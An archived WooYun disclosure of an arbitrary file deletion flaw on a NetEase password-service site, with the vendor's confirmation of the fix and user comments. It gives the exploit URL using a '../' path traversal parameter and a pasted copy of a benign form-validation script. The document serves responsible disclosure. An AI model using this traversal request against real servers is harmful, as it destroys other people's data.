当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-09695

漏洞标题:网易任何删除文件漏洞[严重]

相关厂商:网易

漏洞作者: 鬼哥

提交时间:2012-07-15 22:53

修复时间:2012-08-29 22:54

公开时间:2012-08-29 22:54

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-07-15: 细节已通知厂商并且等待厂商处理中
2012-07-16: 厂商已经确认,细节仅向厂商公开
2012-07-26: 细节向核心白帽子及相关领域专家公开
2012-08-05: 细节向普通白帽子公开
2012-08-15: 细节向实习白帽子公开
2012-08-29: 细节向公众公开

简要描述:

网易任何删除文件漏洞[严重]

详细说明:

漏洞地址:https://mima.163.com/nie/ts_game_upload_remove.aspx?again=&ran=../nie/images/ts/&id=topImg.jpg
想删哪个换目录即可。。测试时删除了2个文件,已备份。
Validator_nV2.js

String.prototype.trim = function() {
return this.replace(/(^\s*)|(\s*$)/g, "");
}
Validator = {
MimaIdCard : "this.IsMimaIdCard(value)",
Pingma : "this.IsPingma(value)",
Require : /.+/,
// Email : /^\w+([-+.]\w+)*@\w+([-.]\w+)*\.\w+([-.]\w+)*$/,
Email : "this.IsEmail(value)",
Phone : /^((\(\d{2,3}\))|(\d{3}\-))?(\(0\d{2,3}\)|0\d{2,3}-)?[1-9]\d{6,7}(\-\d{1,4})?$/,
Mobile : /^1[3458]\d{9}$/,
Url : /^http:\/\/[A-Za-z0-9]+\.[A-Za-z0-9]+[\/=\?%\-&_~`@[\]\':+!]*([^<>\"\"])*$/,
IdCard : "this.IsIdCard(value)",
Currency : /^\d+(\.\d+)?$/,
Number : /^\d+$/,
Zip : /^[1-9]\d{5}$/,
QQ : "this.IsQQ(value)",
Integer : /^[-\+]?\d+$/,
Double : /^[-\+]?\d+(\.\d+)?$/,
English : /^[A-Za-z]+$/,
Chinese : /^[\u0391-\uFFE5]+$/,
Username : /^[a-z]\w{3,}$/i,
UnSafe : /^(([A-Z]*|[a-z]*|\d*|[-_\~!@#\$%\^&\*\.\(\)\[\]\{\}<>\?\\\/\'\"]*)|.{0,5})$|\s/,
IsSafe : function(str) {
return !this.UnSafe.test(str);
},
SafeString : "this.IsSafe(value)",
Filter : "this.DoFilter(value, getAttribute('accept'))",
Limit : "this.limit(value.length,getAttribute('min'), getAttribute('max'))",
Limit2 : "this.limit2(value.length, getAttribute('min'), getAttribute('max'))",
LimitB : "this.limit(this.LenB(value), getAttribute('min'), getAttribute('max'))",
Date : "this.IsDate(value, getAttribute('min'), getAttribute('format'))",
Repeat : "value == document.getElementsByName(getAttribute('to'))[0].value",
Range : "getAttribute('min') < (value|0) && (value|0) < getAttribute('max')",
Compare : "this.compare(value,getAttribute('operator'),getAttribute('to'))",
Custom : "this.Exec(value, getAttribute('regexp'))",
Group : "this.MustChecked(getAttribute('name'), getAttribute('min'), getAttribute('max'))",
ErrorItem : [ document.forms[0] ],
ErrorMessage : [ "以下原因导致提交失败:\t" ],
Validate : function(theForm, mode) {
var obj = theForm || event.srcElement;
var count = obj.elements.length;
this.ErrorMessage.length = 1;
this.ErrorItem.length = 1;
this.ErrorItem[0] = obj;
for ( var i = 0; i < count; i++) {
var breakFor = false;
with (obj.elements[i]) {
var j_show = true;
try{
j_show = j("#"+obj.elements[i].id).is(":visible")
}catch(e){
j_show = true;
}

if (obj.elements[i].style.display != 'none' && j_show) {
var _tipId = obj.elements[i].getAttribute("tipId");
if (_tipId != null) {
$(_tipId).style.display = 'none';
}
var _dataType = getAttribute("dataType");
if (typeof (_dataType) == "object"
|| typeof (this[_dataType]) == "undefined")
continue;
if (getAttribute("require") == "false"
&& value.trim() == "")
continue;
switch (_dataType) {
case "MimaIdCard":
case "Pingma":
case "IdCard":
case "Email":
case "QQ":
case "Date":
case "Repeat":
case "Range":
case "Compare":
case "Custom":
case "Group":
case "Limit":
case "Limit2":
case "LimitB":
case "SafeString":
case "Filter":
if (!eval(this[_dataType])) {
this.AddError(i, getAttribute("msg"));
breakFor = true;
}
break;
default:
if (!this[_dataType].test(value.trim())) {
this.AddError(i, getAttribute("msg"));
breakFor = true;
}
}
}
if (breakFor)
break;
}
}
if (this.ErrorMessage.length > 1) {
mode = mode || 1;
var errCount = this.ErrorItem.length;
switch (mode) {
/* ---------------------------------------- */
case 4:
alert(this.ErrorMessage.join("\n"));
try {
this.ErrorItem[1].focus();
} catch (e) {
}
break;
/* ---------------------------------------- */
case 5:
for ( var i = 1; i < errCount; i++) {
try {
var _tipId = this.ErrorItem[i].getAttribute("tipId");
if (_tipId == null) {
// this.ErrorItem[i].parentNode.style.backgroundColor
// = "red";
} else {
if ($(this.ErrorItem[i].getAttribute("tipId")).className == 'tips') {
$(this.ErrorItem[i].getAttribute("tipId")).className = 'error_tips';
} else if ($(this.ErrorItem[i]
.getAttribute("tipId")).className == 'tip4textarea') {
$(this.ErrorItem[i].getAttribute("tipId")).className = 'error_tip4textarea';
}
if (this.ErrorMessage[i] != "") {
$(this.ErrorItem[i].getAttribute("tipId")).innerHTML = this.ErrorMessage[i]
.replace(/\d+:/, "");
}
if (this.ErrorItem[i].getAttribute("tipId") == 'tip2') {
$(this.ErrorItem[i].getAttribute("tipId")).style.margin = '0px';
}
$(this.ErrorItem[i].getAttribute("tipId")).style.display = 'block';
}
} catch (e) {
alert(e.description + " 5 ");
}
}
if (this.ErrorItem[1].getAttribute("fId") == null) {
// this.ErrorItem[1].focus();
} else {
// alert(this.ErrorItem[1].getAttribute("fId"));
// $(this.ErrorItem[1].getAttribute("fId")).focus();
}
break;
/* ---------------------------------------- */
default:
for ( var i = 1; i < errCount; i++) {
try {
var _tipId = this.ErrorItem[i].getAttribute("tipId");
if (_tipId != null) {
if ($(_tipId).className == 'xPro') {
$(_tipId).className = 'xProerr';
$(_tipId).style.display = "";
$(_tipId).parentNode.parentNode.className = 'prompt';
} else if ($(this.ErrorItem[i]
.getAttribute("tipId")).className == 'tip4textarea') {
$(this.ErrorItem[i].getAttribute("tipId")).className = 'error_tip4textarea';
}
}
} catch (e) {
alert(e.description + " 6 ");
}
}
}
return false;
}
return true;
},
limit : function(len, min, max) {
min = min || 0;
max = max || Number.MAX_VALUE;
return min <= len && len <= max;
},
limit2 : function(len, min, max) {
if (len == 0)
return true;
min = min || 0;
max = max || Number.MAX_VALUE;
return min <= len && len <= max;
},
LenB : function(str) {
return str.replace(/[^\x00-\xff]/g, "**").length;
},
AddError : function(index, str) {
this.ErrorItem[this.ErrorItem.length] = this.ErrorItem[0].elements[index];
this.ErrorMessage[this.ErrorMessage.length] = this.ErrorMessage.length
+ ":" + str;
},
Exec : function(op, reg) {
return new RegExp(reg, "g").test(op);
},
compare : function(op1, operator, op2) {
switch (operator) {
case "NotEqual":
return (op1 != op2);
case "GreaterThan":
return (op1 > op2);
case "GreaterThanEqual":
return (op1 >= op2);
case "LessThan":
return (op1 < op2);
case "LessThanEqual":
return (op1 <= op2);
default:
return (op1 == op2);
}
},
MustChecked : function(name, min, max) {
var groups = document.getElementsByName(name);
var hasChecked = 0;
min = min || 1;
max = max || groups.length;
for ( var i = groups.length - 1; i >= 0; i--)
if (groups[i].checked)
hasChecked++;
return min <= hasChecked && hasChecked <= max;
},
DoFilter : function(input, filter) {
return new RegExp("^.+\.(?=EXT)(EXT)$".replace(/EXT/g, filter.split(
/\s*,\s*/).join("|")), "gi").test(input);
},
IsQQ : function(number) {
if (number.trim() == '') {
return true;
}
return /^[1-9]\d{0,15}$/.test(number.trim());
},
IsMimaIdCard : function(number) {
if (!number || number.trim() == '') {
return false;
}
// 连续7个相同数字则不通过
// return !(/(.)\1{6}/.test(number.trim()));
return true;
},
IsPingma : function(number) {
/* if (number || number != '') {
return (/^[0-9a-zA-Z\\._]{6,16}$/.test(number));
}
return true;
*/
number = number.trim();
if (number == '') {
return true;
}else{
min = 6;
max = 16;
return min <= number.length && number.length <= max;
}
},
IsEmail : function(value) {
return (/^\w+([-+.]\w+)*@\w+([-.]\w+)*\.\w+([-.]\w+)*$/.test(value));
},
IsIdCard : function(number) {
var date, Ai;
var verify = "10x98765432";
var Wi = [ 7, 9, 10, 5, 8, 4, 2, 1, 6, 3, 7, 9, 10, 5, 8, 4, 2 ];
var area = [ '', '', '', '', '', '', '', '', '', '', '', '北京', '天津',
'河北', '山西', '内蒙古', '', '', '', '', '', '辽宁', '吉林', '黑龙江', '',
'', '', '', '', '', '', '上海', '江苏', '浙江', '安微', '福建', '江西',
'山东', '', '', '', '河南', '湖北', '湖南', '广东', '广西', '海南', '', '',
'', '重庆', '四川', '贵州', '云南', '西藏', '', '', '', '', '', '', '陕西',
'甘肃', '青海', '宁夏', '新疆', '', '', '', '', '', '台湾', '', '', '',
'', '', '', '', '', '', '香港', '澳门', '', '', '', '', '', '', '',
'', '国外' ];
var re = number
.match(/^(\d{2})\d{4}(((\d{2})(\d{2})(\d{2})(\d{3}))|((\d{4})(\d{2})(\d{2})(\d{3}[x\d])))$/i);
if (re == null)
return false;
if (re[1] >= area.length || area[re[1]] == "")
return false;
if (re[2].length == 12) {
Ai = number.substr(0, 17);
date = [ re[9], re[10], re[11] ].join("-");
} else {
Ai = number.substr(0, 6) + "19" + number.substr(6);
date = [ "19" + re[4], re[5], re[6] ].join("-");
}
if (!this.IsDate(date, "ymd"))
return false;
var sum = 0;
for ( var i = 0; i <= 16; i++) {
sum += Ai.charAt(i) * Wi[i];
}
Ai += verify.charAt(sum % 11);
return (number.length == 15 || number.length == 18 && number == Ai);
},
IsDate : function(op, formatString) {
formatString = formatString || "ymd";
var m, year, month, day;
switch (formatString) {
case "ymd":
m = op.match(new RegExp(
"^((\\d{4})|(\\d{2}))([-./])(\\d{1,2})\\4(\\d{1,2})$"));
if (m == null)
return false;
day = m[6];
month = m[5] * 1;
year = (m[2].length == 4) ? m[2] : GetFullYear(parseInt(m[3], 10));
break;
case "dmy":
m = op.match(new RegExp(
"^(\\d{1,2})([-./])(\\d{1,2})\\2((\\d{4})|(\\d{2}))$"));
if (m == null)
return false;
day = m[1];
month = m[3] * 1;
year = (m[5].length == 4) ? m[5] : GetFullYear(parseInt(m[6], 10));
break;
default:
break;
}
if (!parseInt(month))
return false;
month = month == 0 ? 12 : month;
var date = new Date(year, month - 1, day);
return (typeof (date) == "object" && year == date.getFullYear()
&& month == (date.getMonth() + 1) && day == date.getDate());
function GetFullYear(y) {
return ((y < 30 ? "20" : "19") + y) | 0;
}
}
}


一个图片:
topImg.jpg

漏洞证明:

漏洞地址:https://mima.163.com/nie/ts_game_upload_remove.aspx?again=&ran=../nie/images/ts/&id=topImg.jpg

修复方案:

你们懂。

版权声明:转载请注明来源 鬼哥@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2012-07-16 17:20

厂商回复:

感谢您对网易的关注,漏洞已修复。

最新状态:

暂无


漏洞评价:

评论

  1. 2012-07-15 22:58 | zhk ( 普通白帽子 | Rank:436 漏洞数:70 | 先看公告~)

    以后要再标题前加:【精华】

  2. 2012-07-15 23:10 | 瓜瓜 ( 普通白帽子 | Rank:173 漏洞数:25 )

    +1

  3. 2012-07-15 23:39 | 猥琐 ( 路人 | Rank:6 漏洞数:2 | 学习什么的最重要!)

    这个厉害

  4. 2012-07-16 00:40 | 水滴 ( 普通白帽子 | Rank:146 漏洞数:24 )

    删谁的?

  5. 2012-07-16 09:45 | 凤凰 ( 路人 | Rank:15 漏洞数:6 | 涅磐)

    @鬼哥 建议标题改为网易任意文件删除漏洞

  6. 2012-07-16 09:57 | Rona ( 实习白帽子 | Rank:88 漏洞数:23 | test)

    求详情

  7. 2012-07-16 10:43 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @凤凰 对头。任意文件这个描述更好。差点把这位凤凰误认为凤凰网···

  8. 2012-07-16 13:17 | 鬼哥 ( 普通白帽子 | Rank:136 漏洞数:13 | 鬼哥 !!!!)

    @凤凰 写错字了。本来是想这样写的。

  9. 2012-08-16 01:27 | Passer_by ( 实习白帽子 | Rank:97 漏洞数:21 | 问题真实存在但是影响不大(腾讯微博Passer...)

    说真的。。测试的时候真没想过去备份。。洞主v5